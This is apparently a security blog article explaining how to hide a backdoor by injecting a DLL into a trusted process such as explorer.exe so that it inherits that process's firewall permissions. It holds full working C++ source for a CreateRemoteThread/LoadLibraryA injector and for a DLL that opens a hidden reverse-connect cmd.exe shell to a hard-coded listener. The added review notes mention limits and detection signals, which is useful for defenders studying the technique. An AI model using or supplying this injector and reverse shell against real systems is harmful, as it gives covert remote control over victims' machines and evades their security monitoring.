Security Path: using remote-thread DLL injection to hide a process and get past a host firewall


Brief introduction

Most backdoors and viruses first try to hide their process, so that an ordinary ring-3 process viewer such as Task Manager does not show an obvious unknown entry. The best-known approach is to inject the malicious code, packaged as a DLL, into a process the system already trusts; Task Manager then shows no separate malicious process, because the code runs inside the host. A reverse-connect backdoor injected into a process that the host firewall already allows outbound (explorer.exe is the usual choice, as are other system processes) also inherits that permission, which is the "wall-piercing" effect. Note the limits of the technique: the DLL is still listed among the host process's loaded modules, the injection itself (a remote thread whose start address is LoadLibrary) is a standard detection pattern for EDR products and for Sysmon (event ID 8, CreateRemoteThread), and the injector needs SeDebugPrivilege, i.e. an elevated account, to open most system processes at all.

Process injection has been in use for well over a decade (this article dates from 2018); many newer techniques are refinements of the same idea, and for the same reason it is one of the best-covered behaviours in host-based detection rules.


C++ code examples

1. Process injection tool (injector) source code:

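// filename: injectdll.cpp
// creator:  peterz1997
// date:     2018-5-15 23:58
// Comment:  DLL inject module
//
// Review notes (security):
//  - Opening another process with PROCESS_ALL_ACCESS requires SeDebugPrivilege,
//    i.e. an elevated token; EnableDebugPriv now reports honestly whether the
//    privilege was really enabled instead of trusting AdjustTokenPrivileges'
//    return value.
//  - The injected DLL stays visible in the target's module list, and a
//    CreateRemoteThread whose start address is LoadLibraryA is one of the most
//    commonly alerted-on patterns in host monitoring; "hidden" here only means
//    "no separate process entry in Task Manager".
//  - Injector and target must have the same bitness: the LoadLibraryA address
//    taken from this process is only meaningful in a same-bitness target.
//  - The listing assumes an ANSI (non-UNICODE) build: all buffers are char.
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <windows.h>
#include <tlhelp32.h>

using namespace std;

#define MAX_COUNT 255

/**
 * @brief Enable a named privilege on the current process token.
 * @param name Privilege name, e.g. SE_DEBUG_NAME.
 * @return true only if the privilege is actually enabled afterwards.
 *
 * AdjustTokenPrivileges returns TRUE even when it could not enable the
 * privilege (GetLastError() == ERROR_NOT_ALL_ASSIGNED, the normal outcome on
 * a non-elevated token), so that case is checked explicitly.  The token
 * handle, which the original leaked, is always closed.
 */
bool EnableDebugPriv(LPCSTR name)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        printf("[!] Get Process Token error!\n");
        return false;
    }

    bool enabled = false;
    LUID luid;
    if (!LookupPrivilegeValueA(NULL, name, &luid)) {
        printf("[!] Get Privilege error!\n");
    } else {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)
            || GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
            printf("[!] Adjust Privilege error!\n");
        } else {
            enabled = true;
        }
    }

    CloseHandle(hToken);
    return enabled;
}

/**
 * @brief Make the target process load a DLL by running LoadLibraryA on a new
 *        thread inside it.
 * @param pid          Target process ID.
 * @param dllFileName  Absolute path of the DLL.  LoadLibraryA resolves
 *                     relative paths against the *target's* current directory,
 *                     so a relative name would fail or load the wrong file.
 * @return true if the remote LoadLibraryA call returned a non-NULL module.
 *
 * The remote thread is waited for, so the remote buffer can be freed and the
 * LoadLibraryA result (its exit code) checked; the original returned true as
 * soon as the thread was created and leaked the process handle, the thread
 * handle and the remote allocation.
 */
bool InjectDllProc(DWORD pid, LPCSTR dllFileName)
{
    if (!EnableDebugPriv(SE_DEBUG_NAME)) {
        return false;
    }

    HANDLE hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hRemoteProcess == NULL) {
        printf("[!] Open Target Process error!\n");
        return false;
    }

    bool injected = false;
    HANDLE hRemoteThread = NULL;
    const SIZE_T pathBytes = strlen(dllFileName) + 1;   // include the terminating NUL
    char* pszDllSpace = (char*)VirtualAllocEx(hRemoteProcess, NULL, pathBytes,
                                              MEM_COMMIT, PAGE_READWRITE);

    do {
        if (pszDllSpace == NULL) {
            printf("[!] Alloc Space error!\n");
            break;
        }
        if (!WriteProcessMemory(hRemoteProcess, pszDllSpace, dllFileName, pathBytes, NULL)) {
            printf("[!] Write to the Memory error!\n");
            break;
        }

        // kernel32 is mapped at the same base in every process of the same
        // bitness, so our LoadLibraryA address is valid in the target.
        PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
        if (pfnStartAddr == NULL) {
            printf("[!] Get <LoadLibrary> Function error!\n");
            break;
        }

        hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
                                           pfnStartAddr, pszDllSpace, 0, NULL);
        if (hRemoteThread == NULL) {
            printf("[!] Create Remote Thread error!\n");
            break;
        }

        // The thread's exit code is LoadLibraryA's return value (truncated to
        // 32 bits): zero means the DLL did not load in the target.
        WaitForSingleObject(hRemoteThread, INFINITE);
        DWORD exitCode = 0;
        if (!GetExitCodeThread(hRemoteThread, &exitCode) || exitCode == 0) {
            printf("[!] LoadLibrary failed in target process!\n");
            break;
        }
        injected = true;
    } while (false);

    if (hRemoteThread != NULL) {
        CloseHandle(hRemoteThread);
    }
    if (pszDllSpace != NULL) {
        // Safe to release: the remote thread has finished with the string.
        VirtualFreeEx(hRemoteProcess, pszDllSpace, 0, MEM_RELEASE);
    }
    CloseHandle(hRemoteProcess);
    return injected;
}

/**
 * @brief Look up a process ID by executable name (case-insensitive).
 * @param procName Image name as reported by the tool-help snapshot,
 *                 e.g. "explorer.exe".
 * @return PID of the first match in snapshot order; 0 if no process matched;
 *         (DWORD)-1 if the snapshot could not be created.
 *
 * The snapshot handle is always closed; the original returned from inside
 * the loop on a match and leaked it.
 */
DWORD GetProcPid(LPCSTR procName)
{
    HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcSnap == INVALID_HANDLE_VALUE) {
        printf("[!] Can not Create Process Snap!\n");
        return (DWORD)-1;
    }

    DWORD pid = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    for (BOOL more = Process32First(hProcSnap, &pe32); more;
         more = Process32Next(hProcSnap, &pe32)) {
        if (_stricmp(procName, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    CloseHandle(hProcSnap);
    return pid;
}

/**
 * @brief Entry point:  injectDll.exe <process name> <dll name>
 *
 * The DLL argument is turned into an absolute path before it is handed to the
 * target, because LoadLibraryA runs with the target's current directory.  The
 * original concatenated our current directory by hand, which produced a bad
 * path for an already-absolute argument and could truncate silently;
 * GetFullPathNameA covers both cases.  Existence is checked with
 * GetFileAttributesA, which has no find handle to leak.
 */
int main(int argc, char* argv[])
{
    if (argc != 3) {
        printf("[*usage*] injectDll.exe <process name> <dll name>\n");
        return 0;
    }

    char dllPath[MAX_PATH] = {0};
    DWORD len = GetFullPathNameA(argv[2], sizeof(dllPath), dllPath, NULL);
    if (len == 0 || len >= sizeof(dllPath)) {
        printf("[!] Can not resolve Dll path!\n");
        return 0;
    }
    if (GetFileAttributesA(dllPath) == INVALID_FILE_ATTRIBUTES) {
        printf("[!] Can not Find Dll File!\n");
        return 0;
    }

    DWORD pid = GetProcPid(argv[1]);
    if (pid == 0 || pid == (DWORD)-1) {
        // Not found, or the snapshot failed; the original passed pid 0 on to
        // OpenProcess in the first case.
        printf("[*]inject Dll error!\n");
        return 0;
    }

    if (!InjectDllProc(pid, dllPath)) {
        printf("[!] Inject Dll error!\n");
        return 0;
    }
    printf("[*]inject Dll success!\n");
    return 0;
}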



2. Sample DLL (payload) source code:

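// filename: backdoordll.cpp
// creator:  peterz1997
// date:     2018-5-11 00:10
// Comment:  zero-pipe backdoor DLL — a reverse-connect cmd.exe shell
//
// Review notes (security):
//  - The listener address and port are hard-coded and the channel is plain
//    TCP with no authentication or encryption: whoever answers on that
//    address, or can sniff the segment, gets the shell.
//  - cmd.exe runs with the token of whatever process the DLL was injected
//    into.  Task Manager shows the host's name, but the DLL (module list)
//    and the child cmd.exe (process tree) are visible to any tool that looks.
//  - DllMain only starts a thread and returns; the thread cannot run until
//    DllMain has returned, and doing more than that inside DllMain is unsafe
//    because of the loader lock.
//  - The listing assumes an ANSI (non-UNICODE) build: the A-suffixed Win32
//    functions are used to match the char buffers.
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <winsock2.h>   // must precede windows.h
#include <windows.h>
#pragma comment(lib, "ws2_32")

using namespace std;

#define MAX_COUNT 255

/**
 * @brief Thread routine: run <system dir>\cmd.exe with the given socket as
 *        its stdin, stdout and stderr, and wait until the shell exits.
 * @param lpParameter The connected SOCKET, passed as LPVOID.
 * @return 0 always.
 *
 * The socket only works as a child's standard handle if it is inheritable and
 * non-overlapped; WSASocket(..., 0, 0) in BackdoorThread creates exactly that,
 * and bInheritHandles is TRUE below so the child receives it.  The original
 * ignored CreateProcess's result (and then waited on an uninitialised handle)
 * and leaked pi.hThread.
 */
DWORD WINAPI StartShellProc(LPVOID lpParameter)
{
    SOCKET sServer = (SOCKET)lpParameter;

    char cmdLine[MAX_COUNT] = {0};
    if (GetSystemDirectoryA(cmdLine, sizeof(cmdLine)) == 0) {
        return 0;   // original went on and would have launched "\cmd.exe"
    }
    StringCchCatA(cmdLine, sizeof(cmdLine), "\\cmd.exe");

    STARTUPINFOA si;
    GetStartupInfoA(&si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sServer;

    PROCESS_INFORMATION pi = {0};
    if (!CreateProcessA(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        return 0;
    }

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}

/**
 * @brief Thread routine: connect back to the hard-coded listener, send a
 *        banner and hand the socket to StartShellProc; returns when the
 *        shell has exited.
 * @param lpParameter Unused (NULL).
 * @return 0 always.
 *
 * Unlike the original, the socket is closed and WSAStartup is balanced by
 * WSACleanup on every path, and the StartShellProc thread handle is closed.
 */
DWORD WINAPI BackdoorThread(LPVOID lpParameter)
{
    (void)lpParameter;
    char szMessage[MAX_COUNT] = "===========> hello,admin <=============\n";

    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) {
        return 0;
    }

    // dwFlags == 0: a non-overlapped socket, required for use as a std handle.
    SOCKET sServer = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sServer != INVALID_SOCKET) {
        sockaddr_in sin;
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(45000);
        sin.sin_addr.S_un.S_addr = inet_addr("192.168.120.1");   // lab listener from the original

        if (connect(sServer, (sockaddr*)&sin, sizeof(sin)) != SOCKET_ERROR
            && send(sServer, szMessage, (int)strlen(szMessage), 0) != SOCKET_ERROR) {
            HANDLE hThread = CreateThread(NULL, 0, StartShellProc, (LPVOID)sServer, 0, NULL);
            if (hThread != NULL) {
                WaitForSingleObject(hThread, INFINITE);
                CloseHandle(hThread);
            }
        }
        closesocket(sServer);
    }

    WSACleanup();
    return 0;
}

/**
 * @brief DLL entry point: on process attach, start BackdoorThread and return
 *        at once so the loader lock is released.
 *
 * The thread handle is closed immediately: nothing ever joins this thread.
 * The original declared the return type as bool; DllMain returns BOOL.
 */
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    if (fdwReason == DLL_PROCESS_ATTACH) {
        HANDLE hThread = CreateThread(NULL, 0, BackdoorThread, NULL, 0, NULL);
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
    }
    // DLL_THREAD_ATTACH / DLL_THREAD_DETACH / DLL_PROCESS_DETACH: nothing to do.
    return TRUE;
}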

Security Path: using remote-thread DLL injection to hide a process and get past a host firewall
